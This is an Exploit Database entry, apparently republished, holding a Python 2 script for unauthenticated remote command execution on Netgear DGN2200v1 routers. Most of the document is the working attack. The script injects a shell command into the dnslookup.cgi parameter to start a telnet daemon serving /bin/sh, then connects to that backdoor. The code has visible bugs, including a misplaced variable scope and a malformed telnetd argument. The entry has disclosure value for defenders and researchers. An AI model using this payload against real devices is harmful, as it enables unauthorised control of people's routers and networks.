Netgear DGN2200v1 – Remote Command Execution (RCE) (Unauthenticated)

• Exploit Database
• 15 阅读

• 作者： SivertPL
  日期： 2021-07-06
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50099/

• # Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)
  # Date: 02.07.2021
  # Exploit Author: SivertPL
  # Vendor Homepage: https://www.netgear.com/
  # Version: All prior to v1.0.0.60
  
  #!/usr/bin/python
  
  """
  NETGEAR DGN2200v1 Unauthenticated Remote Command Execution
  
  Author: SivertPL (kroppoloe@protonmail.ch)
  Date: 02.07.2021
  Status: Patched in some models
  Version: All prior to v1.0.0.60
  Impact: Critical 
  
  CVE: No CVE number assigned
  PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365
  
  
  References: 
  1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
  2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1
  
  
  The exploit script only works on UNIX-based systems.
  
  This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past.
  This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol.
  
  """
  
  import sys
  import requests
  import os
  
  target_ip = "192.168.0.1"
  telnet_port = 666
  sent = False
  
  def main():
  if len(sys.argv) < 3:
  print "./dgn2200_pwn.py <router ip> <backdoor-port>"
  exit()
  
  target_ip = sys.argv[1]
  telnet_port = int(sys.argv[2])
  print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..."
  send_payload()
  print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..."
  print "[!] If it fails to connect it means the target is probably not vulnerable"
  spawn_shell()
  
  def send_payload():
  try:
  requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true")
  sent = True
  except Exception:
  sent = False
  print "[-] Unknown error, target might not be vulnerable."
  
  def spawn_shell():
  if sent:
  print "[+] Dropping a shell..."
  os.system("telnet " + target_ip + " " + telnet_port)
  else:
  exit()
  
  
  if __name__ == "__main__":
  main()